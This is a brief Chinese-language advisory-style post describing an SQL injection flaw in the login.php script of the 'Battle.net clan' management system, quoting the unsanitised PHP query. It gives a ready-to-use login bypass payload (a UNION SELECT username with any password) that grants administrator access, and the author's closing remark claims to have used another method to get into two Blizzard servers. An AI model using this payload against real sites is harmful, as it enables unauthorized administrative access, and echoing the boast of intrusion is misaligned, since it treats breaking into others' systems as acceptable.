美国暴雪[魔兽世界]官方程序漏洞

美国暴雪[魔兽世界]官方程序漏洞 Battle.net clan管理系统使用MySQL后端，允许用户方便的升级和维护web站点。

系统实现上存在输入验证漏洞，远程安全者可能利用此漏洞执行SQL注入安全，非授权获取系统的管理权限。

Battle.net clan的login.php脚本没有正确地验证通过index.php对user参数的输入：

line 9 --> ＄user = ＄_POST['user'];
line 10--> ＄pass = ＄_POST['pass'];

.....
.....
.....

line 21--> mysql_query("Select * FROM bcs_members Where name='＄user' AND password='＄pass'", ＄link);

允许安全者以管理员权限登录。但成功安全要求禁用了magic_quotes_gpc。

Username : ' union select 0,0,0,0,0,0,0,0,0,0,0 from bcs_members/*
password : enything

注:sourceforge上发布的这个和我12月份拿到暴雪某两个负载时候的方法不同,他们是今年4月多发现的。